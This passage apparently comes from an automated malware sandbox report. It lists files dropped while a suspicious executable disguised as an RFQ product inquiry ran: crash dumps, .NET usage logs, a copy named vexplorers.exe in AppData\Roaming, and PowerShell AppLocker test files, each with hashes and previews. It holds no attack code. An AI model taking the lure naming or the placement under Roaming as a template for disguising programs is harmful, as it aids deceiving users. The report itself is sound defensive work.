                                                                        Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERF243.tmp.dmp

                                                                        Download File
                                                                        Process:C:\Windows\System32\WerFault.exe
                                                                        File Type:Mini DuMP crash report, 16 streams, Wed May 8 07:21:21 2024, 0x1205a4 type
                                                                        Category:dropped
                                                                        Size (bytes):505425
                                                                        Entropy (8bit):3.2363884830152916
                                                                        Encrypted:false
                                                                        SSDEEP:3072:dXshDgnMCOBC5GJVlhXsP8FUFfU1QDGlcwAwNM4fXKvtx2bcSiwtH1CCq4s03+vu:dXXMCcC5yhXqVUPJqF03QR6
                                                                        MD5:66E79631AE1794EEA671C85324E9AC1D
                                                                        SHA1:0DC250E29E5E646C61B6307FB4BE3FF178BB98CF
                                                                        SHA-256:2519B1D8A88B127A250BB812FF1CC58563528F3C42F4EBC870C24A603994961D
                                                                        SHA-512:D005C1423D67A831C31B3CC86B64A4575AB0BAF94F623FFF94BD64108CAAEE447B7D74E67A978DE290D43B74174F1EC4C2BB63DFF79BF6E488314B690B853F9F
                                                                        Malicious:false
                                                                        Preview:MDMP..a..... ........';f........................p...........$...4%..........X%.......P..Z...........l.......8...........T............9...|..........<C..........(E..............................................................................eJ.......E......Lw......................T........ ...';f............................. ..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERF438.tmp.WERInternalMetadata.xml

                                                                        Download File
                                                                        Process:C:\Windows\System32\WerFault.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):8786
                                                                        Entropy (8bit):3.710135589420279
                                                                        Encrypted:false
                                                                        SSDEEP:192:R6l7wVeJb5Zd26Y92ukZgmf4Ad6J0NprQ89b/+9fp1m:R6lXJFZd26YMuigmf44iE/kfS
                                                                        MD5:ED31B8ED8053D05F8DF5D675990EA24D
                                                                        SHA1:C4713D0ED5A82767BDAD3E66EB077EBA9D381F8C
                                                                        SHA-256:40789ED5B8CA082ADB43BB28BE2A9707FF70D4145311EC04F04B29F7A7A0A786
                                                                        SHA-512:AEB8E2912DF2DED811FF3C34FAA664C9D5BAEA4599E462BF1E4364B364E9F787A5DB540886C4092D239F45A0C9C0B05C0AA83E98A3354C5416ADE9DF0A45BF15
                                                                        Malicious:false
                                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.8.3.9.6.<./.P.i.

                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERF497.tmp.xml

                                                                        Download File
                                                                        Process:C:\Windows\System32\WerFault.exe
                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):4741
                                                                        Entropy (8bit):4.480806070878578
                                                                        Encrypted:false
                                                                        SSDEEP:48:cvIwWl8zsTJg771I9ZOWpW8VYIpYm8M4JCyx2FBelryq85LI46bLKtFBd:uIjftI76v7VqJCteJfutFBd
                                                                        MD5:FFC45F4F6A9AEE4F633DBDE76BAA6D61
                                                                        SHA1:DDF44F1CA79BD0FEE1A7BD3782D329192CE97642
                                                                        SHA-256:C0F6C3627DA73ED7EB1ED8FBF469354F6F8026CAD76038D370307E6771C19C20
                                                                        SHA-512:10313321468278D2BCBD85A18977FF9D8AA5922BB579BE3702FA55503975ED70E747545EDBF50A44B150EC7DCEC94069F47384099E51481E2D055B07134CD33A
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="313824" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERF4CA.tmp.csv

                                                                        Download File
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):89700
                                                                        Entropy (8bit):3.0148628562061823
                                                                        Encrypted:false
                                                                        SSDEEP:768:+Y1YKGncJqommxA0jL8DTVy0enXkyYTgZXIy+DaxKoHnYOiNU:+oXGtommBL8v40enU7Tg5Iy+DqnYOiNU
                                                                        MD5:EE551E3886B4C9A459642ADA5BFD7037
                                                                        SHA1:2B0B9EE822AD3C84880FF44DDEB53B4413558053
                                                                        SHA-256:89A710600FD55C09B6004C370722EABC273F1E77EF6E637BCCEBF043EB9D56A2
                                                                        SHA-512:E9221B5870EE04240B60873471D47BB171867EBB474AF0300F0BFDFD1E090A5C61BCCC4B3D75B4CA5202EBE4A3B531D600DD30A79EE3E6C6DA350397D8415AB8
                                                                        Malicious:false
                                                                        Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERFD08.tmp.txt

                                                                        Download File
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):13340
                                                                        Entropy (8bit):2.685194353996654
                                                                        Encrypted:false
                                                                        SSDEEP:96:TiZYWVhKPzpM6YkYUVWikzHcYEZjztEiKcyC4WNHhwa6s4aGY9M7NKId33:2ZD7iTrThJN4aGY9M7N9d33
                                                                        MD5:DF0C927278CF227B204FEFD514A4BC1F
                                                                        SHA1:8D9097BF29959D8A909A2F6CF705D8F0DF179FB5
                                                                        SHA-256:3FA4721D83DBE2B1216519F21CD1F9D7D7FBFF869E3766574297BF88F5E8169C
                                                                        SHA-512:B809006B9F770C3CBC3BA70757F3266D76EE40130E20D4EA32E5F5D6301EE919C5D623FAA67FBD8C0BE92BA9414B16B983BBBC520D38C7213B52C8A0FE8BD228
                                                                        Malicious:false
                                                                        Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe.log

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe
                                                                        File Type:CSV text
                                                                        Category:dropped
                                                                        Size (bytes):654
                                                                        Entropy (8bit):5.380476433908377
                                                                        Encrypted:false
                                                                        SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                                        MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                                        SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                                        SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                                        SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                                        Malicious:false
                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\vexplorers.exe.log

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exe
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):411
                                                                        Entropy (8bit):5.331640912793073
                                                                        Encrypted:false
                                                                        SSDEEP:12:Q3La/hSoDLI4MWuCIAWDLI4MWuCqDLI4MWuPTAv:MLbAE4KdAmE4K5E4KO
                                                                        MD5:41DE845B592D0C0A18195E5AAB7B2A8D
                                                                        SHA1:AB0656E0E0137593BE7984F44B4603407C6F7A32
                                                                        SHA-256:ECC1BC8EFC8E479E0D7E1B4934F298B074A1D5AACAA3A73490CCCF2BFF440908
                                                                        SHA-512:F4F84F2E23A2A11D6FB0BC00384A051B7811E65DD2DE9CE4CF2923247B5721A3A0B8DB335959B15EBCD15F7A8E5E530E452B8A5A537F3C16D70BFFC6C6A654F9
                                                                        Malicious:false
                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.AddIn, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Runtime.Remoting, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..

                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):64
                                                                        Entropy (8bit):0.34726597513537405
                                                                        Encrypted:false
                                                                        SSDEEP:3:Nlll:Nll
                                                                        MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                        Malicious:false
                                                                        Preview:@...e...........................................................

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0wbu0pil.k04.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3npyekog.vm3.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c3feogrm.tk1.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cf3hbqo4.lap.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_crfzavkw.0h2.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f1eyxsqi.pt2.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f2aiilyw.0ro.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_geyuzr4k.pba.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_htlcjiub.phh.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l4itrnkq.j3r.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_omi2ze2v.5lx.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pbbxlini.qoi.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ppj2exep.vdh.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
